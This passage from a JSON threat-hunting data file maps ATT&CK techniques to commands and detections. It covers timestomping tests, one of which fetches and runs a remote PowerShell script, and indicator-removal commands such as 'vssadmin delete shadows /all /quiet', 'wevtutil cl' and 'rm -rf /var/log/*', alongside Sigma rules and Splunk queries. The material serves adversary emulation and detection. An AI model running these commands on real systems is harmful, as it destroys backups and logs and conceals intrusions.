"b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c", + "description": "Modifies the file creation timestamp of a specified file. This technique was seen in use by the Stitch RAT.\nTo verify execution, use File Explorer to view the Properties of the file and observe that the Created time is the year 1970.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "target_date_time": { + "description": "Date/time to replace original timestamps with", + "type": "String", + "default": "01/01/1970 00:00:00" + }, + "file_path": { + "description": "Path of file to change creation timestamp", + "type": "Path", + "default": "$env:TEMP\\T1551.006_timestomp.txt" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "A file must exist at the path (#{file_path}) to change the creation time on\n", + "prereq_command": "if (Test-Path #{file_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Path #{file_path} -Force | Out-Null\nSet-Content #{file_path} -Value \"T1551.006 Timestomp\" -Force | Out-Null\n" + } + ], + "executor": { + "command": "Get-ChildItem #{file_path} | % { $_.CreationTime = \"#{target_date_time}\" }\n", + "cleanup_command": "Remove-Item #{file_path} -Force -ErrorAction Ignore\n", + "name": "powershell" + } + }, + { + "name": "Windows - Modify file last modified timestamp with PowerShell", + "auto_generated_guid": "f8f6634d-93e1-4238-8510-f8a90a20dcf2", + "description": "Modifies the file last modified timestamp of a specified file. This technique was seen in use by the Stitch RAT.\nTo verify execution, use File Explorer to view the Properties of the file and observe that the Modified time is the year 1970.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "target_date_time": { + "description": "Date/time to replace original timestamps with", + "type": "String", + "default": "01/01/1970 00:00:00" + }, + "file_path": { + "description": "Path of file to change modified timestamp", + "type": "Path", + "default": "$env:TEMP\\T1551.006_timestomp.txt" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "A file must exist at the path (#{file_path}) to change the modified time on\n", + "prereq_command": "if (Test-Path #{file_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Path #{file_path} -Force | Out-Null\nSet-Content #{file_path} -Value \"T1551.006 Timestomp\" -Force | Out-Null\n" + } + ], + "executor": { + "command": "Get-ChildItem #{file_path} | % { $_.LastWriteTime = \"#{target_date_time}\" }\n", + "cleanup_command": "Remove-Item #{file_path} -Force -ErrorAction Ignore\n", + "name": "powershell" + } + }, + { + "name": "Windows - Modify file last access timestamp with PowerShell", + "auto_generated_guid": "da627f63-b9bd-4431-b6f8-c5b44d061a62", + "description": "Modifies the last access timestamp of a specified file. This technique was seen in use by the Stitch RAT.\nTo verify execution, use File Explorer to view the Properties of the file and observe that the Accessed time is the year 1970.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "target_date_time": { + "description": "Date/time to replace original timestamps with", + "type": "String", + "default": "01/01/1970 00:00:00" + }, + "file_path": { + "description": "Path of file to change last access timestamp", + "type": "Path", + "default": "$env:TEMP\\T1551.006_timestomp.txt" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "A file must exist at the path (#{file_path}) to change the last access time on\n", + "prereq_command": "if (Test-Path #{file_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Path #{file_path} -Force | Out-Null\nSet-Content #{file_path} -Value \"T1551.006 Timestomp\" -Force | Out-Null\n" + } + ], + "executor": { + "command": "Get-ChildItem #{file_path} | % { $_.LastAccessTime = \"#{target_date_time}\" }\n", + "cleanup_command": "Remove-Item #{file_path} -Force -ErrorAction Ignore\n", + "name": "powershell" + } + }, + { + "name": "Windows - Timestomp a File", + "auto_generated_guid": "d7512c33-3a75-4806-9893-69abc3ccdd43", + "description": "Timestomp kxwn.lock.\n\nSuccessful execution will include the placement of kxwn.lock in #{file_path} and execution of timestomp.ps1 to modify the time of the .lock file. \n\n[Mitre ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/master/adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/defensive-evasion/4a2ad84e-a93a-4b2e-b1f0-c354d6a41278.yml)\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "file_path": { + "description": "File path for timestomp payload", + "type": "String", + "default": "$env:appdata\\Microsoft" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "timestomp.ps1 must be present in #{file_path}.\n", + "prereq_command": "if (Test-Path #{file_path}\\timestomp.ps1) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest \"https://raw.githubusercontent.com/mitre-attack/attack-arsenal/bc0ba1d88d026396939b6816de608cb279bfd489/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/timestomp.ps1\" -OutFile \"#{file_path}\\timestomp.ps1\"\n" + }, + { + "description": "kxwn.lock must be present in #{file_path}.\n", + "prereq_command": "if (Test-Path -path \"#{file_path}\\kxwn.lock\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Path #{file_path}\\kxwn.lock -ItemType File\n" + } + ], + "executor": { + "command": "import-module #{file_path}\\timestomp.ps1\ntimestomp -dest \"#{file_path}\\kxwn.lock\"\n", + "cleanup_command": "Remove-Item #{file_path}\\timestomp.ps1 -ErrorAction Ignore\nRemove-Item #{file_path}\\kxwn.lock -ErrorAction Ignore", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1070", + "command_list": [ + "fsutil usn deletejournal /D C:\n", + "fsutil.exe usn deletejournal /D", + "vssadmin.exe delete shadows /all /quiet", + "wbadmin.exe delete catalog -quiet", + "wevtutil.exe /cl", + "wmic.exe /NODE:*shadowcopy delete *", + "wevtutilcl", + "wevtutil|cl", + "fsutil|usn|deletejournal", + "fsutilusn|deletejournal", + "powershell/credentials/mimikatz/purge", + "powershell/management/lock", + "powershell/management/logoff", + "powershell/management/restart", + "python/persistence/osx/RemoveDaemon", + "```", + "rm -rf /var/log/*" + ], + "commands": [ + { + "command": "fsutil usn deletejournal /D C:\n", + "source": "atomics/T1070/T1070.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host" + }, + { + "command": "fsutil.exe usn deletejournal /D", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "vssadmin.exe delete shadows /all /quiet", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "wbadmin.exe delete catalog -quiet", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "wevtutil.exe /cl", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "wmic.exe /NODE:*shadowcopy delete *", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "wevtutilcl", + "source": "SysmonHunter - Indicator Removal on Host", + "name": "" + }, + { + "command": "wevtutil|cl", + "source": "SysmonHunter - Indicator Removal on Host", + "name": "" + }, + { + "command": "fsutil|usn|deletejournal", + "source": "SysmonHunter - Indicator Removal on Host", + "name": "" + }, + { + "command": "fsutilusn|deletejournal", + "source": "SysmonHunter - Indicator Removal on Host", + "name": "" + }, + { + "command": "powershell/credentials/mimikatz/purge", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/management/lock", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/management/logoff", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/management/restart", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/persistence/osx/RemoveDaemon", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "```", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "rm -rf /var/log/*", + "source": "Kirtar22/Litmus_Test", + "name": "" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1070", + "display_name": "Indicator Removal on Host", + "atomic_tests": [ + { + "name": "Indicator Removal using FSUtil", + "auto_generated_guid": "b4115c7a-0e92-47f0-a61e-17e7218b2435", + "description": "Manages the update sequence number (USN) change journal, which provides a persistent log of all changes made to files on the volume. Upon execution, no output\nwill be displayed. More information about fsutil can be found at https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "fsutil usn deletejournal /D C:\n", + "cleanup_command": "fsutil usn createjournal m=1000 a=100 c:\n", + "name": "command_prompt", + "elevation_required": true + } + } + ] + }, + { + "chain_id": "100034", + "os": "windows", + "parent_process": "fsutil.exe", + "commandline_string": "usn deletejournal /D", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "indicator_removal", + "mitre_attack": "T1070", + "itw_sample": "https://www.joesecurity.org/reports/report-71b6a493388e7d0b40c83ce903bc6b04.html#overview" + }, + { + "chain_id": "100083", + "os": "windows", + "parent_process": "vssadmin.exe", + "commandline_string": "delete shadows /all /quiet", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "indicator_removal", + "mitre_attack": "T1070", + "itw_sample": "51bf86b51ec3a3bf21bc9a9ea7c00f2599efafda93535c2d7e92dd1d07380332" + }, + { + "chain_id": "100084", + "os": "windows", + "parent_process": "wbadmin.exe", + "commandline_string": "delete catalog -quiet", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "indicator_removal", + "mitre_attack": "T1070", + "itw_sample": "" + }, + { + "chain_id": "100085", + "os": "windows", + "parent_process": "wevtutil.exe", + "commandline_string": "/cl", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "indicator_removal", + "mitre_attack": "T1070", + "itw_sample": "https://www.joesecurity.org/reports/report-fbbdc39af1139aebba4da004475e8839.html" + }, + { + "chain_id": "100101", + "os": "windows", + "parent_process": "wmic.exe", + "commandline_string": "/NODE:*shadowcopy delete *", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "indicator_removal", + "mitre_attack": "T1070", + "itw_sample": "" + }, + { + "name": "Indicator Removal on Host", + "description": null, + "level": "high", + "phase": "Defense Evasion", + "query": [ + { + "type": "process", + "process": { + "image": { + "pattern": "wevtutil" + }, + "cmdline": { + "pattern": "cl" + } + } + }, + { + "type": "process", + "process": { + "cmdline": { + "pattern": "wevtutil|cl", + "op": "and" + } + } + }, + { + "type": "process", + "process": { + "cmdline": { + "pattern": "fsutil|usn|deletejournal", + "op": "and" + } + } + }, + { + "type": "process", + "process": { + "image": { + "pattern": "fsutil" + }, + "cmdline": { + "pattern": "usn|deletejournal", + "op": "and" + } + } + } + ] + }, + { + "Empire Module": "powershell/credentials/mimikatz/purge", + "ATT&CK Technique #1": "T1070", + "ATT&CK Technique #2": "", + "Technique": "Indicator Removal on Host", + "Concatenate for Python Dictionary": "\"powershell/credentials/mimikatz/purge\": [\"T1070\"]," + }, + { + "Empire Module": "powershell/management/lock", + "ATT&CK Technique #1": "T1070", + "ATT&CK Technique #2": "", + "Technique": "Indicator Removal on Host", + "Concatenate for Python Dictionary": "\"powershell/management/lock\": [\"T1070\"]," + }, + { + "Empire Module": "powershell/management/logoff", + "ATT&CK Technique #1": "T1070", + "ATT&CK Technique #2": "", + "Technique": "Indicator Removal on Host", + "Concatenate for Python Dictionary": "\"powershell/management/logoff\": [\"T1070\"]," + }, + { + "Empire Module": "powershell/management/restart", + "ATT&CK Technique #1": "T1070", + "ATT&CK Technique #2": "", + "Technique": "Indicator Removal on Host", + "Concatenate for Python Dictionary": "\"powershell/management/restart\": [\"T1070\"]," + }, + { + "Empire Module": "python/persistence/osx/RemoveDaemon", + "ATT&CK Technique #1": "T1070", + "ATT&CK Technique #2": "", + "Technique": "Indicator Removal on Host", + "Concatenate for Python Dictionary": "\"python/persistence/osx/RemoveDaemon\": [\"T1070\"]," + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where process_path contains \"wevtutil\"", + "name": "Indicator Removal On Host" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=linux_audit syscall=263 | table host,auid,uid,euid,exe,key", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=linux_audit type=PATH name=*.log nametype=delete", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "-a always,exit -F arch=b64 -F PATH=/var/log -S unlinkat -F auid>=1000 -F auid!=4294967295 -F key=delete_logs", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=\"bash_history\" rm * .log | table host, user_name, bash_command", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + } + ], + "possible_detections": [ + "auditlogs (audit.rules)", + "bash_history logs", + { + "title": "Disable of ETW Trace", + "id": "a238b5d0-ce2d-4414-a676-7a531b3d13d6", + "description": "Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.", + "references": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil", + "https://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_mal_lockergoga.yml", + "https://abuse.io/lockergoga.txt" + ], + "author": "@neu5ron, Florian Roth", + "date": "2019/03/22", + "tags": [ + "attack.execution", + "attack.t1070", + "car.2016-04-002" + ], + "level": "high", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection_clear_1": { + "CommandLine": "* cl */Trace*" + }, + "selection_clear_2": { + "CommandLine": "* clear-log */Trace*" + }, + "selection_disable_1": { + "CommandLine": "* sl* /e:false*" + }, + "selection_disable_2": { + "CommandLine": "* set-log* /e:false*" + }, + "condition": "selection_clear_1 or selection_clear_2 or selection_disable_1 or selection_disable_2" + } + }, + { + "title": "Suspicious eventlog clear or configuration using wevtutil", + "id": "cc36992a-4671-4f21-a91d-6c2b72a2edf5", + "description": "Detects clearing or configuration of eventlogs uwing wevtutil. Might be used by ransomwares during the attack (seen by NotPetya and others)", + "author": "Ecco", + "date": "2019/09/26", + "tags": [ + "attack.execution", + "attack.t1070", + "car.2016-04-002" + ], + "level": "high", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection_binary_1": { + "Image": "*\\wevtutil.exe" + }, + "selection_binary_2": { + "OriginalFileName": "wevtutil.exe" + }, + "selection_clear_1": { + "CommandLine": "* cl *" + }, + "selection_clear_2": { + "CommandLine": "* clear-log *" + }, + "selection_disable_1": { + "CommandLine": "* sl *" + }, + "selection_disable_2": { + "CommandLine": "* set-log *" + }, + "condition": "(1 of selection_binary_*) and (1 of selection_clear_* or 1 of selection_disable_*)" + }, + "falsepositives": [ + "Admin activity", + "Scripts and administrative tools used in the monitored environment" + ] + }, + { + "title": "Eventlog Cleared", + "id": "d99b79d2-0a6f-4f46-ad8b-260b6e17f982", + "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", + "references": [ + "https://twitter.com/deviouspolack/status/832535435960209408", + "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100" + ], + "author": "Florian Roth", + "tags": [ + "attack.defense_evasion", + "attack.t1070", + "car.2016-04-002" + ], + "logsource": { + "product": "windows", + "service": "system" + }, + "detection": { + "selection": { + "EventID": 104, + "Source": "Microsoft-Windows-Eventlog" + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ], + "level": "medium" + }, + { + "title": "Security Eventlog Cleared", + "id": "f2f01843-e7b8-4f95-a35a-d23584476423", + "description": "Some threat groups tend to delete the local 'Security' Eventlog using certain utitlities", + "tags": [ + "attack.defense_evasion", + "attack.t1070", + "car.2016-04-002" + ], + "author": "Florian Roth", + "logsource": { + "product": "windows", + "service": "security" + }, + "detection": { + "selection": { + "EventID": [ + 517, + 1102 + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", + "System provisioning (system reset before the golden image creation)" + ], + "level": "high" + }, + [ + "4663", + "File monitoring" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file deletion", + "description": "A file was deleted.", + "source_data_element": "process", + "relationship": "deleted", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file deletion", + "description": "A file was deleted.", + "source_data_element": "user", + "relationship": "deleted", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key deletion", + "description": "A registry key was deleted.", + "source_data_element": "user", + "relationship": "deleted", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key deletion", + "description": "A registry key was deleted.", + "source_data_element": "process", + "relationship": "deleted", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key deletion", + "description": "A registry key was deleted.", + "source_data_element": "process", + "relationship": "deleted", + "target_data_element": "windows registry key value" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "computer" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "application" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "cloud service" + }, + { + "data_source": "user account", + "definition": "The representation of a 